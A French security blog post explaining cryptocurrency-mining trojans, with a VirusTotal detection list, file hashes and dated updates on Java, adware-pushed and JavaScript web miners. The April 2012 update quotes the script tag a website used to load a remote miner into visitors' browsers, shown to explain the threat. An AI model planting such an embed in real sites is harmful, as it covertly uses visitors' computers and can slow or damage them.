Dans le billet précédent CyberGate @ Numericable, je parlais de “Pour monétiser.
En effet le botmaster a aussi installé un Trojan.Bitcoin que l’on retrouve souvent avec ces RAT.
Dans cette page nous parlerons donc des trojan CoinMiner.
C’est à dire de programmes malveillants (trojan, cheval de troie) qui visent à utiliser l’ordinateur, à l’insu du propriétaire, afin de générer des bitcoin ou autre crypto-monnaie.
On parle alors de miner.
Table des matières
- 1 Mais qu’est ce que BitCoin ?
- 2 Trojan Bitcoin
- 3 Supprimer les trojan bitcoin
- 4 EDIT Avril 2012 – BitCoin a travers Java
- 5 EDIT – Juillet 2015 : Trojan Miner poussé par des PUPs/Adwares
- 6 EDIT – 22 Mai 2017 : Crypto-Monnaie et attaque MS17-010
- 7 EDIT – Septembre 2017 : le web miner ou miner depuis un site internet
Mais qu’est ce que BitCoin ?
Concrètement, Bitcoin est une monnaie virtuelle dont une des méthodes pour gagner de l’argent est le minage.
Ce principe consiste à vérifier les transactions faites en bitcoin, nécessitant une puissance de calcul et énergie à travers leurs ordinateurs, les miners sont rémunérés en retour.
D’autre part, Bitcoin permet de faire transiter de l’argent plus ou moins de manière anonyme, ce qui peut permettre de transférer des sommes entre Cybercriminel ou éventuellement de blanchir de l’argent.
Par la suite, de nouvelles monnaies virtuelles ont vu le jour, le principe est grosso modo identique.
Pour plus d’informations, se rendre sur notre dossier : Comprendre les crypto-monnaie ou monnaie virtuelle : Bitcoin, Ethereum, etc
Trojan Bitcoin
Comme vous le savez, les botnets peuvent servir à gagner de l’argent, sous diférentes méthodes :
- soit via des campagnes de SPAM
- en louant le Botnet pour des attaques DDoS.
- Soit en installant des adwares pour ouvrir des popups de publicités ou en faisant installer des logiciels tiers et en touchant de l’argent via les PPI (exemple avec Offerbox).
Depuis Juin 2011, une nouvelle méthode consiste à utiliser les ordinateurs du botnet et de les faire miner pour générer des bitcoins.
L’opération se fait en faisant tout simplement installer un programme qui va tourner en fond et utiliser la CPU de l’ordinateur infecté pour miner.
La majorité de ces programmes sont assez bourrins et tournent à 100 de CPU ce qui est pas très discret.
Mais on peut imaginer par la suite des modules plus intelligents qui se calquent à la puissance du CPU pour ne pas ralentir le PC et être plus discret.
Exemple de Trojan Bitcoin
Ci-dessus, on peut constater qu’un processus SystemMiner en .Net a été installé.
Ce dernier lance à son tour des processus bitcoin-miner.exe
Et plus bas un miner.exe qui est à fond la caisse au niveau CPU, ce dernier génère des bitcoins.
Si l’on suspend miner.exe, ce sont les autres processus bitcoin-miner.exe qui prenne le relai pour utiliser la CPU et générer des bitcoins.
Comme le montre ces captures d’écran et comme expliqué plus haut, ces miners ne sont pas très discrets puisqu’ils plombent la CPU et ralentissent l’ordinateur.
L’utilisateur de l’ordinateur va donc vite s’apercevoir que quelque chose ne tourne pas rond.
Voici un exemple de détection d’un miner BitCoin :
File name: smona131594996965193399859 Submission date: 2011-09-13 21:45:01 (UTC) Current status: finished Result: 22 /43 (51.2%) VT Community Compact Print results Antivirus Version Last Update Result AhnLab-V3 2011.09.13.00 2011.09.13 Trojan/Win32.BitMiner AntiVir 7.11.14.189 2011.09.13 SPR/Tool.BitCoinMiner.a.6 Antiy-AVL 2.0.3.7 2011.09.13 RiskTool/Win32.BitCoinMiner.gen Avast 4.8.1351.0 2011.09.13 - Avast5 5.0.677.0 2011.09.13 - AVG 10.0.0.1190 2011.09.13 BitCoinMiner.A BitDefender 7.2 2011.09.13 Application.BitCoinMiner.B ByteHero None 2011.09.13 - CAT-QuickHeal 11.00 2011.09.13 - ClamAV 0.97.0.0 2011.09.13 - Commtouch 5.3.2.6 2011.09.13 - Comodo 10102 2011.09.13 ApplicUnsaf.Win32.RiskTool.BitCoinMiner.A DrWeb 5.0.2.03300 2011.09.13 Tool.BtcMine.2 Emsisoft 5.1.0.11 2011.09.13 Win32.SuspectCrc!IK eSafe 7.0.17.0 2011.09.13 Win32.SPRTool.BitCoi eTrust-Vet 36.1.8558 2011.09.13 - F-Prot 4.6.2.117 2011.09.13 - F-Secure 9.0.16440.0 2011.09.13 Application.BitCoinMiner.B Fortinet 4.3.370.0 2011.09.11 HackerTool/BitCoinMiner GData 22 2011.09.13 Application.BitCoinMiner.B Ikarus T3.1.1.107.0 2011.09.13 Win32.SuspectCrc Jiangmin 13.0.900 2011.09.13 - K7AntiVirus 9.112.5128 2011.09.13 Riskware Kaspersky 9.0.0.837 2011.09.13 not-a-virus:RiskTool.Win32.BitCoinMiner.a McAfee 5.400.0.1158 2011.09.13 Generic PUP.z!ga McAfee-GW-Edition 2010.1D 2011.09.13 Generic PUP.z!ga Microsoft 1.7604 2011.09.13 Program:Win32/CoinMiner NOD32 6461 2011.09.13 a variant of Win32/BitCoinMiner Norman 6.07.11 2011.09.13 - nProtect 2011-09-13.01 2011.09.13 - Panda 10.0.3.5 2011.09.13 - PCTools 8.0.0.5 2011.09.13 - Prevx 3.0 2011.09.13 - Rising 23.74.03.03 2011.09.09 - Sophos 4.69.0 2011.09.13 Bitcoin Miner SUPERAntiSpyware 4.40.0.1006 2011.09.13 - Symantec 20111.2.0.82 2011.09.13 - TheHacker 6.7.0.1.293 2011.09.10 - TrendMicro 9.500.0.1008 2011.09.13 - TrendMicro-HouseCall 9.500.0.1008 2011.09.13 - VBA32 3.12.16.4 2011.09.13 - VIPRE 10466 2011.09.13 RiskTool.Win32.BitCoinMiner ViRobot 2011.9.10.4666 2011.09.13 not-a-virus.RiskTool.Win32.BitCoinMiner.740352 Additional information Show all MD5 : 404fba79dc22aef44914498bfe3ba04f SHA1 : e73acf50164d78c5c0102785a90c0618e2e53362 SHA256: bd51420383e3a71d6390c383b1d79ceefe4cb415d54d3a811e07b2371f025730
Autres exemples de Trojan Bitcoin
Si l’installation de trojan BitCoin par des RAT/Cybergate est courante. On assiste aussi à une généralisation, certainement car cela fonctionne bien et que les contre pouvoir sont faibles (le temps de se mettre en place etc) et le fait que le système est décentralisé, ça ne doit pas aider.
- Un article de NOD32 qui nous informe que Backdoor.Win32.Bafruz installe BitCoin : http://blog.eset.com/2011/08/29/win32delf-qcz-additional-details
- Un botnet en BitCoin : http://www.securelist.com/en/blog/208193084/The_Miner_Botnet_Bitcoin_Mining_Goes_Peer_To_Peer
- Dans le même temps, des stealer pour BitCoin voit le jour (pour voler les BitCoins) – un article de NOD32 qui explique qu’un utilisateur s’est fait voler 25k Bitcoin (soit 500k $) : http://blog.eset.com/2011/06/16/bitcoin-%E2%80%9Cwallet%E2%80%9D-hacked-%E2%80%93-heisted-500k
- Enfin à l’heure est écrit cet article, Kaspersky nous informe qu’un module BitCoin a été ajouté au malware TDSS : http://www.securelist.com/en/blog/559/TDSS_Bitcoin
- Quand les PUPs/Adwares abusent : Trojan Miner
- Quelques Trojan miner sont présents sur cette page : Ransomware WannaCry / Petya et attaques MS17-010 (SMB)
- Sur la page suivante : svchost.exe forte utilisation CPU et Trojan
et en vidéo des trojans miners :
Supprimer les trojan bitcoin
Vous trouverez des fichiers qui expliquent comment désinfecter votre ordinateur et supprimer les Trojan Bitcoin : http://www.supprimer-virus.com/?s=miner
Notamment parmis les plus répandus, on trouve : Claymore Bitcoin
EDIT Avril 2012 – BitCoin a travers Java
Ce n’est pas la première fois que je tombe sur ce cas, je tiens donc le signaler : des trojan bitcoin en Java.
Vu sur un site pourri… Firefox qui tente de lancer un jar. Par habitude, on pense à un exploit qui se lance.
Mais aucun dropper à l’horizon… Java qui bourrine au niveau de la CPU.
Du côté des connexions, on peux voir :
TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json
Au final, donc un client bitcoin en Java.
Le site en question qui lance le client ne contient qu’un appel à un javascript qui se charge ensuite de lancer le JAR :
<script src="//www.bitcoinplus.com/js/miner.js" type="text/javascript"></script><script type="text/javascript">BitcoinPlusMiner(1202421)</script>
L’adresse du Jar : http://www.bitcoinplus.com/jar/bitcoinplus-miner.jar
Ce n’est pas le site officiel de bitcoin (http://bitcoin.org)
- Mais bitcoinplus.com n’est bloqué par aucun antivirus : https://www.virustotal.com/url/d2efa6989690975e7f17a73d5f909e7ae98b194992696947e9ca47eab820e3e6/analysis/1334919287/
- Le Javascript est à 0 sur VirusTotal : https://www.virustotal.com/file/7278e2b94d7dd8aaf1d561a333c336a583d2a431fcebe407be63e3947c9bc3bf/analysis/1334919289/
- Seul Dr.Web détecte le JAR : https://www.virustotal.com/file/a10f79eaddc7d8f3ce0871ea4b9e022a5a179c7a00f502e8fcf25b539ae7f5f3/analysis/1334919357/
Avast! ne bloque pas le chargement du jar :
Le code n’est pas forcément malveillant et bitcoin.com ne distribue pas de virus informatiques puisqu’au final c’est un client bitcoin en java.
Ici ce qui pose problème, c’est plutôt l’utilisation qui en est faite.
Cela reste une utilisation du PC à l’insu de son propriétaire pour générer de l’argent et en plus cela cause des ralentissements voire cela peut générer des plantages (et si le PC a un problème de refroidissement, cela peux causer des problèmes matériels).
Sur ce forum apparemment le webmaster a choisi cette méthode :
http://forum.gmod.biz/showthread.php?1540-Bitcoin-Mining
http://forum.gmod.biz/showthread.php?1576-Forum-java-application
Assez gênant !
EDIT – Juillet 2015 : Trojan Miner poussé par des PUPs/Adwares
Les PUPs/Adwares qui poussent des Troja Miner, voir la page : Quand les PUPs/Adwares abusent : Trojan Miner
EDIT – 22 Mai 2017 : Crypto-Monnaie et attaque MS17-010
Un edit de cette page autour des trojan bitcoin pour signaler que les ransomwares utilisent ce mode de paiement.
A tel point que lors de l’attaque de WannaCry, qui s’est aussi accompagné de pas mal de campagnes pour installer des trojan bitcoin.
Cela a peu jouer sur la valeur du bitcoin et faire gonfler artificiellement celle-ci.
Plusieurs exemple de campagnes de Trojan bitcoin : Wana Decryptor (aka WannaCry) et attaques MS17-010
EDIT – Septembre 2017 : le web miner ou miner depuis un site internet
Un nouvelle méthode qui devrait être de plus en plus utilisée, faire miner les visiteurs de sites internet.
Un JavaScript inclut sur les pages d’un site internet peut faire miner les ordinateurs des visiteurs.
Cela se traduit par l’augmentation de la charge CPU du navigateur internet
Plus d’informations : Les Web Miner : Minage de crypto-monnaie à partir des pages internet (JavaScript)